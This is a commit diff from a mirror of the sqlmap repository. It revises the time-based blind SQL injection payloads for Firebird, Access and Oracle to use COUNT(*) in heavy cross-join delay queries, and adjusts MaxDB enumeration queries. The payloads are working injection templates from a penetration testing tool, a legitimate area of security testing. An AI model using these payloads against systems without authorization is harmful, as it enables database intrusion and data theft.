sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-02-03 05:04:11 +03:00
Code Issues Packages Projects Releases Wiki Activity

bug fix (in SELECT based heavy queries COUNT(*) should be used; otherwise multiple row error happens without proper delay)

Browse Source
This commit is contained in:
Miroslav Stampar 2010-12-09 10:17:04 +00:00
parent ec5c08ca7a
commit 094baadc5b
2 changed files with 15 additions and 15 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

26
xml/payloads.xml
View File

@ -1413,7 +1413,7 @@ Formats:
<where>1</where>
<vector></vector>
<request>
<payload>; SELECT [RANDNUM] FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6;</payload>
<payload>; SELECT COUNT(*) FROM RDB$FIELDS AS T1, RDB$TYPES AS T2, RDB$COLLATIONS AS T3;</payload>
<comment>--</comment>
</request>
<response>
@ -1514,9 +1514,9 @@ Formats:
<risk>1</risk>
<clause>1,2,3</clause>
<where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7) ELSE [RANDNUM] END)</vector>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7) ELSE [RANDNUM] END)</vector>
<request>
<payload>AND [RANDNUM]=(SELECT [RANDNUM] FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7)</payload>
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7)</payload>
</request>
<response>
<time>[DELAYED]</time>
@ -1552,9 +1552,9 @@ Formats:
<risk>1</risk>
<clause>1,2,3</clause>
<where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) ELSE [RANDNUM] END)</vector>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) ELSE [RANDNUM] END)</vector>
<request>
<payload>AND [RANDNUM]=(SELECT [RANDNUM] FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5)</payload>
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5)</payload>
</request>
<response>
<time>[DELAYED]</time>
@ -1591,9 +1591,9 @@ Formats:
<risk>1</risk>
<clause>1</clause>
<where>1</where>
<vector>AND [RANDNUM]=IIF(([INFERENCE]),(SELECT [RANDNUM] FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6),[RANDNUM])</vector>
<vector>AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1, RDB$TYPES AS T2, RDB$COLLATIONS AS T3),[RANDNUM])</vector>
<request>
<payload>AND [RANDNUM]=(SELECT [RANDNUM] FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6)</payload>
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1, RDB$TYPES AS T2, RDB$COLLATIONS AS T3)</payload>
</request>
<response>
<time>[DELAYED]</time>
@ -1693,9 +1693,9 @@ Formats:
<risk>3</risk>
<clause>1,2,3</clause>
<where>2</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7) ELSE [RANDNUM] END)</vector>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7) ELSE [RANDNUM] END)</vector>
<request>
<payload>OR [RANDNUM]=(SELECT [RANDNUM] FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7)</payload>
<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7)</payload>
</request>
<response>
<time>[DELAYED]</time>
@ -1731,9 +1731,9 @@ Formats:
<risk>4</risk>
<clause>1,2,3</clause>
<where>2</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) ELSE [RANDNUM] END)</vector>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) ELSE [RANDNUM] END)</vector>
<request>
<payload>OR [RANDNUM]=(SELECT [RANDNUM] FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5)</payload>
<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5)</payload>
</request>
<response>
<time>[DELAYED]</time>
@ -1770,9 +1770,9 @@ Formats:
<risk>3</risk>
<clause>1</clause>
<where>2</where>
<vector>OR [RANDNUM]=IIF(([INFERENCE]),(SELECT [RANDNUM] FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6),[RANDNUM])</vector>
<vector>OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1, RDB$TYPES AS T2, RDB$COLLATIONS AS T3),[RANDNUM])</vector>
<request>
<payload>OR [RANDNUM]=(SELECT [RANDNUM] FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6)</payload>
<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1, RDB$TYPES AS T2, RDB$COLLATIONS AS T3)</payload>
</request>
<response>
<time>[DELAYED]</time>

4
xml/queries.xml
View File

@ -437,8 +437,8 @@
<blind query="SELECT MIN(username) FROM domain.users WHERE username > '%s'" count="SELECT CHR(COUNT(*)) FROM domain.users"/>
</users>
<columns>
<inband query="SELECT columnname, datatype, len FROM DOMAIN.COLUMNS WHERE tablename = '%s' AND schemaname=user ORDER BY pos"/>
<blind query="SELECT columnname FROM DOMAIN.COLUMNS WHERE tablename = '%s' AND schemaname=user ORDER BY pos" query2="SELECT datatype FROM DOMAIN.COLUMNS WHERE tablename = '%s' AND schemaname=user ORDER BY pos"/>
<inband query="SELECT columnname, datatype, len FROM domain.columns WHERE tablename = '%s' AND schemaname=user ORDER BY pos"/>
<blind query="SELECT columnname FROM domain.columns WHERE tablename = '%s' AND schemaname=user ORDER BY pos" query2="SELECT datatype FROM domain.columns WHERE tablename = '%s' AND schemaname=user ORDER BY pos"/>
</columns>
<tables>
<inband query="SELECT tablename FROM domain.tables WHERE schemaname='%s' AND type='TABLE'"/>